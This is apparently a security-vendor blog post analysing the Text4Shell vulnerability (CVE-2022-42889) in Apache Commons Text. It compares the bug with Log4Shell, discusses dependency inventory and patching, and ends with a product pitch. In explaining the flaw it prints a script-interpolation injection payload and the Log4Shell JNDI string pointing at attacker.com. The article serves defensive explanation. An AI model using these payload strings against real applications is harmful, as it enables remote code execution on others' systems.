Vulnerability Analysis

Text4Shell (CVE-2022-42889): Apache Commons Text and the Haunting Echo of Log4Shell

A critical RCE vulnerability in Apache Commons Text drew immediate comparisons to Log4Shell. While less severe in practice, it highlighted how deeply embedded utility libraries create systemic risk.

Nayan Dey
Security Engineer
6 min read

When security researcher Alvaro Munoz disclosed CVE-2022-42889 in October 2022, the security community immediately reached for the comparison that dominated every vulnerability discussion since December 2021: "Is this the next Log4Shell?" The vulnerability, quickly dubbed "Text4Shell," affected Apache Commons Text, a widely used Java library for string manipulation. Like Log4j, Apache Commons Text is a foundational utility library embedded in countless applications. Like Log4Shell, Text4Shell allowed remote code execution through string interpolation. But the story of Text4Shell is less about the vulnerability itself and more about what it reveals about how the software industry handles library-level risk.

The Technical Details

Apache Commons Text provides a StringSubstitutor class that performs variable interpolation on strings. By default, this class supports several interpolation prefixes including dns:, url:, and critically, script:. The script: prefix triggers the Java ScriptEngine, which can execute arbitrary code.

If an application passes untrusted input through StringSubstitutor.replace() or related methods without sanitization, an attacker can inject a payload like:

${script:javascript:java.lang.Runtime.getRuntime().exec('malicious command')}

This is conceptually similar to Log4Shell's ${jndi:ldap://attacker.com/exploit} pattern. Both vulnerabilities exploit string interpolation features that process embedded expressions in ways that developers don't anticipate.

The vulnerability affected Apache Commons Text versions 1.5 through 1.9. The fix in version 1.10.0 disabled the script, dns, and url interpolators by default, requiring explicit opt-in for these dangerous features.

Why It Wasn't Quite Log4Shell

Despite the surface similarities, Text4Shell had a meaningfully smaller blast radius than Log4Shell for several reasons.

Usage patterns differ. Log4j processes virtually all string data that flows through a Java application because logging is ubiquitous. Apache Commons Text's StringSubstitutor is used in more targeted scenarios. Not every application using Commons Text actually calls the vulnerable interpolation methods, and fewer still pass untrusted input to them.

The attack surface is narrower. Log4Shell could be triggered through HTTP headers, URL parameters, form fields, or any data that eventually reached a log statement. Text4Shell requires that attacker-controlled input specifically reaches a StringSubstitutor call, which is a more constrained attack path.

Detection was faster. The security community was primed after Log4Shell. Within hours of disclosure, major vulnerability scanners had detection signatures. Organizations that had built Log4Shell response playbooks could adapt them quickly.

That said, dismissing Text4Shell as a non-issue would be a mistake. The CVSS score of 9.8 reflected real risk for applications that did pass untrusted input through string interpolation. Several proof-of-concept exploits demonstrated reliable remote code execution in vulnerable configurations.

The Deeper Problem: Invisible Dependencies

Text4Shell's real lesson isn't about one CVE. It's about the systemic risk created by utility libraries that sit deep in dependency trees. Apache Commons Text had over 2,500 direct dependents on Maven Central at the time of disclosure. Each of those dependents had their own dependents, creating a transitive dependency chain that's nearly impossible to trace manually.

Consider a typical enterprise Java application. It might not directly depend on Apache Commons Text at all. But it probably depends on a framework that depends on a library that depends on Commons Text. When CVE-2022-42889 dropped, many development teams had to answer a question they'd never considered: "Do we even use Apache Commons Text?"

This is the same dynamic that made Log4Shell so chaotic. Organizations spent weeks inventorying their applications because they had no reliable way to determine which applications included the vulnerable library. Many discovered Log4j in places they never expected: embedded firmware, SaaS products, internal tools built years ago by developers who had long since left.

Text4Shell replayed this inventory challenge. Teams that had built SBOM (Software Bill of Materials) practices after Log4Shell found they could answer the question in minutes. Teams that hadn't were back to manual dependency tree analysis, grep searches through build files, and hope.

The Industry Response

The response to Text4Shell was notably more measured than the Log4Shell panic. This was partly because the vulnerability was less severe, but also because organizations had improved their vulnerability response capabilities.

Major cloud providers scanned their managed services and pushed updates within days. Container image scanners added detection quickly. CISA issued an advisory but didn't declare the kind of emergency response that Log4Shell warranted.

However, the response also revealed persistent gaps. Many organizations still couldn't quickly determine whether they were affected. Internal tooling and legacy applications remained blind spots. And the long tail of patching, as always, extended for months.

Exploitation in the Wild

Unlike Log4Shell, which saw mass exploitation within hours, Text4Shell exploitation was more targeted. Security firms observed scanning activity probing for vulnerable endpoints within days of disclosure, but widespread exploitation didn't materialize at the same scale.

This doesn't mean the vulnerability was benign. Targeted exploitation is harder to detect and often more damaging than mass scanning. Sophisticated threat actors who identified vulnerable applications could achieve reliable code execution with minimal noise.

Honeypot data from several security research firms showed a steady trickle of exploitation attempts throughout late 2022, with payloads ranging from simple reverse shells to more complex staged attacks. The lower volume compared to Log4Shell likely reflects the narrower attack surface rather than a lack of attacker interest.

Patching and Remediation

Apache released version 1.10.0 of Commons Text, which disabled the dangerous interpolators by default. The fix was straightforward, but deployment followed the usual pattern: rapid adoption by actively maintained projects, slow or nonexistent updates for legacy and abandoned software.

For organizations that couldn't immediately update, the mitigation was to ensure that no untrusted input reached StringSubstitutor methods. This required code auditing to identify all call sites, a process that ranged from trivial in small applications to impractical in large codebases without proper tooling.

What Should Have Been Different

Text4Shell was a case where SBOM practices would have immediately shortened the response cycle. If every application maintained an accurate, up-to-date SBOM, determining exposure would take seconds instead of days. The technology for this has existed for years. The adoption has been painfully slow.

Additionally, the pattern of "dangerous defaults in utility libraries" should have been addressed more aggressively after Log4Shell. Library maintainers should default to the safest configuration and require explicit opt-in for features that can execute arbitrary code. The Apache Commons Text team's fix, disabling dangerous interpolators by default, is exactly the right approach, but it should have been the default from the start.

How Safeguard.sh Helps

Safeguard.sh's SBOM generation and continuous dependency monitoring directly address the inventory problem that Text4Shell exposed. When a new CVE drops against a transitive dependency buried three levels deep in your dependency tree, Safeguard.sh tells you immediately which of your applications are affected. No manual grep searches, no guessing.

The platform's vulnerability scanning catches known CVEs in your dependency chain before they become incidents. Policy gates can enforce minimum library versions and block builds that include known-vulnerable dependencies. For a vulnerability like Text4Shell, this means your CI/CD pipeline catches the risk at build time rather than after a security advisory sends your team scrambling.

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.